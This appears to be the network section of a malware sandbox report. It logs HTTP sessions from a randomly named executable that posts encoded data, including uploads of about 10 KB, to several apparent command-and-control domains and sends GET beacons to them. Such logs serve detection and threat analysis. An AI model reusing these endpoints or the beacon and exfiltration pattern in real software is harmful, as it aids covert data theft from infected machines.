                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      7 | 192.168.2.4 | 49788 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:36:55.333189011 CET | 10801 | OUT | POST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:36:55.796694994 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      8 | 192.168.2.4 | 49803 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:36:57.920348883 CET | 438 | OUT | GET /ve8l/?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8= HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:37:06.343494892 CET | 377 | IN | HTTP/1.1 200 OK
                                                                                                                                      content-type: text/html
                                                                                                                                      date: Sat, 11 Jan 2025 08:37:06 GMT
                                                                                                                                      content-length: 256
                                                                                                                                      connection: close
                                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8="}</script></head></html>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      9 | 192.168.2.4 | 49886 | 173.0.157.187 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:37:11.400544882 CET | 690 | OUT | POST /5m3m/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.0be.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.0be.info
                                                                                                                                      Referer: http://www.0be.info/5m3m/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=hcYoCLalClNIjcRnZ95NBk2FUB8Unezy7P5vyONoUJw4cHNeKaNguTTFTqOH8JnYeXC3gWqj6sPKOKw+JC1zkBWkT5frhST/yAd0SFucvd8VBhWfwhPpXkiQriYyeRdUeoqQ2nJ5lCfXNyoG6BscpCnLl+iL7sMUFEi3HftL8jaen3KYPqj3073IEyde5AR4MQ==
                                                                                                                                      Jan 11, 2025 09:37:12.018016100 CET | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:37:11 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49903 | 173.0.157.187 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:37:13.943309069 CET | 710 | OUT | POST /5m3m/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.0be.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.0be.info
                                                                                                                                      Referer: http://www.0be.info/5m3m/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=hcYoCLalClNIj8BnaehNQ02GXB8Uo+y57PFvyP4zX7U4cmdeYOZgizTFL6OO4JnHeXPKgXmj6sbKOJk+Jz1wlRWmfZfluyT/yAd0SB+6vdkVBRmfwAPmJUiTmyYyUxdQeoqu2ihXlAnXN2sG5UADyynJ7OiaqvVAJRL0Z/ZV8RiDmxHCebCgm7T7Z1Uq0DsxXRGAIkult3wFlzGq55wuarE=
Jan 11, 2025 09:37:14.551887989 CET | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:37:14 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 23V,VH(,JM0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49923 | 173.0.157.187 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:37:16.538211107 CET | 10792 | OUT | POST /5m3m/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.0be.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.0be.info
                                                                                                                                      Referer: http://www.0be.info/5m3m/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:37:17.087085962 CET | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:37:17 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 23V,VH(,JM0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49937 | 173.0.157.187 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:37:19.077018976 CET | 435 | OUT | GET /5m3m/?sTS=sewIB7u3B3NHgPpecNRVGRfHaR4xptSr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekzKmes/Xrk63tnUiEwK+oMVFTyGd1xnpI1E=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.0be.info
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:37:19.664984941 CET | 217 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:37:19 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      Data Raw: 66 0d 0a 4c 69 6e 6b 20 69 73 20 65 78 70 69 72 65 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: fLink is expired0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 50021 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:37:40.974416971 CET | 693 | OUT | POST /r99d/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.ssps.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.ssps.shop
                                                                                                                                      Referer: http://www.ssps.shop/r99d/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=puifggN9xZ4A14iF7F351VI2v5wAB+xHsS8CqsRSTORFGvSQcCI4l3fpNCrJcUvuAxs4UsKjU4NSN54JJ0wQe80tuNJDkFNn3pcMIxmqqT6R1CU30CmMwEKNn8BXNVuQuNBby3VKJJ5KUvLEye7w9ld/Li/bp46CPP8DCWd4N++DH7HGQKzEQvwB8gipdOXcSw==
Jan 11, 2025 09:37:41.426584959 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 50022 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:37:43.533693075 CET | 713 | OUT | POST /r99d/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.ssps.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.ssps.shop
                                                                                                                                      Referer: http://www.ssps.shop/r99d/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=puifggN9xZ4AnJSFrVL59VI1q5wAIexDsSwCqp18Q4pFBOiQdH04k3fpVSrIYUusAxwvUuejU7xSN9oJJHITcs0v7dJB5VNn3pcMIyaQqTyR0yk31jmLu0KM3sBXcFuUuNBtyzNwJM9KUrPEyLP3zVc0FC/QvqfyBvlfdgFeEuqELdKcB7STCvUyhnrdQNqVJzYie6s3EGuQbcWTVlBvITM=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50023 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:37:46.086414099 CET | 10795 | OUT | POST /r99d/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.ssps.shop
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.ssps.shop
                                                                                                                                      Referer: http://www.ssps.shop/r99d/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:37:46.582156897 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 50024 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:37:48.632308960 CET | 436 | OUT | GET /r99d/?sTS=ksK/jUMQwoE3w4qDzm/qv01bg55PF/RmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4idscl/ZtmhgZI2+0bahWoqT3AjAY6wh2Hxmo=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.ssps.shop
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:37:49.081126928 CET | 377 | IN | HTTP/1.1 200 OK
                                                                                                                                      content-type: text/html
                                                                                                                                      date: Sat, 11 Jan 2025 08:37:49 GMT
                                                                                                                                      content-length: 256
                                                                                                                                      connection: close
                                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sTS=ksK/jUMQwoE3w4qDzm/qv01bg55PF/RmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4idscl/ZtmhgZI2+0bahWoqT3AjAY6wh2Hxmo=&fd=Cr_TAhTpvZaLf"}</script></head></html>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      17 | 192.168.2.4 | 50025 | 38.47.233.4 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:37:54.481193066 CET | 690 | OUT | POST /fqrq/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.qqc5.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.qqc5.top
                                                                                                                                      Referer: http://www.qqc5.top/fqrq/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=V20nVuuNf5SAs1Jii8krK7Mab9r+aUTo+ycdzS3uDmF0yIxlmmc5TZVJMDicGkx22j3TUMI+PiNCzujhD0c3kcUq17Ytzsg7X0vNRSuP+asHhuU7q9xWu9ckm6IcN16o+6MBvXYiVYEdnuygQQ7pQ0dYBgLPhc+sTXajuEHjjnM3jjEB2k8lhd9ziv7HF8vXMw==


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      18 | 192.168.2.4 | 50026 | 38.47.233.4 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:37:57.026593924 CET | 710 | OUT | POST /fqrq/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.qqc5.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.qqc5.top
                                                                                                                                      Referer: http://www.qqc5.top/fqrq/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=V20nVuuNf5SA2U5iu7wrNbMZY9r+T0Sv+1UdzTj+Dwt0xq5lgXc5SZVJDjidIExL2j7tUM0+PiJCzrfhCHE0lMUs4bYvu8g7X0vNRS6p+a0Hh+E7rcxVt9cnh6Icb16k+6MjvW0EVaMdntmgQiTqLkdacQKDxJD2LinupCH6gnElrFJbnVdyzdZA/oyzI/SeX9/2e3xg3yQ/hVE07aYp7S4=
                                                                                                                                      Jan 11, 2025 09:37:57.897891998 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:37:57 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 548
                                                                                                                                      Connection: close
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      19 | 192.168.2.4 | 50027 | 38.47.233.4 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:37:59.837841988 CET | 10792 | OUT | POST /fqrq/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.qqc5.top
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.qqc5.top
                                                                                                                                      Referer: http://www.qqc5.top/fqrq/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=[TRUNCATED]
                                                                                                                                      Jan 11, 2025 09:38:00.591064930 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:00 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 548
                                                                                                                                      Connection: close
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      20 | 192.168.2.4 | 50028 | 38.47.233.4 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:38:02.490263939 CET | 435 | OUT | GET /fqrq/?sTS=Y0cHWYGzbrmggkpfvJxXUOlrVtzgTlaz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh+4z5Ml02qUNdUfINiCsx6tEm640t8Frn4Y=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.qqc5.top
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:38:03.309673071 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 548
                                                                                                                                      Connection: close
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      21 | 192.168.2.4 | 50029 | 199.192.23.123 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:38:08.375169992 CET | 705 | OUT | POST /6npp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.learnnow.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.learnnow.info
                                                                                                                                      Referer: http://www.learnnow.info/6npp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=unOdt6hg6b46MFp8esFGRviQLUODOsmpTBT9WzWtjFx9RCQ7FyDzmfzD2/uL+q5cTZqiKqdLk97pPt6fej/0pG6bwn3do+f8W1/BQz7pWWjc2vf4n+Mem4YMHGd/mN/NRoJ1Iqq212IcUkWwkxmCdDIFxSsOzIzv5UliWjzQSKz2Ux/+Goa3e7AvdMwkvfy7HA==
                                                                                                                                      Jan 11, 2025 09:38:08.962650061 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:08 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 389
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      22 | 192.168.2.4 | 50030 | 199.192.23.123 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:38:10.927804947 CET | 725 | OUT | POST /6npp/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.learnnow.info
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.learnnow.info
                                                                                                                                      Referer: http://www.learnnow.info/6npp/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=unOdt6hg6b46Nk58NdFGGfiTB0ODbcmyTBP9WyS9/nl9UWc7KTDzlfzDvPuOwK5LTZWAKrhLk9HpPsKfey/37m6F7H3f1Of8W1/BQzuhWSHc2eP4mb4d4oYPXWd/iN/JRoJHIofT1wEcUm+wkgmNUDIL/ytejdqax0Y3XyfsQJuQV3ykXZ7gM7kcAL5QicPycEUGCjFFD5wpz4QRhj9l79I=
Jan 11, 2025 09:38:11.524224043 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:38:11 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 389
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html
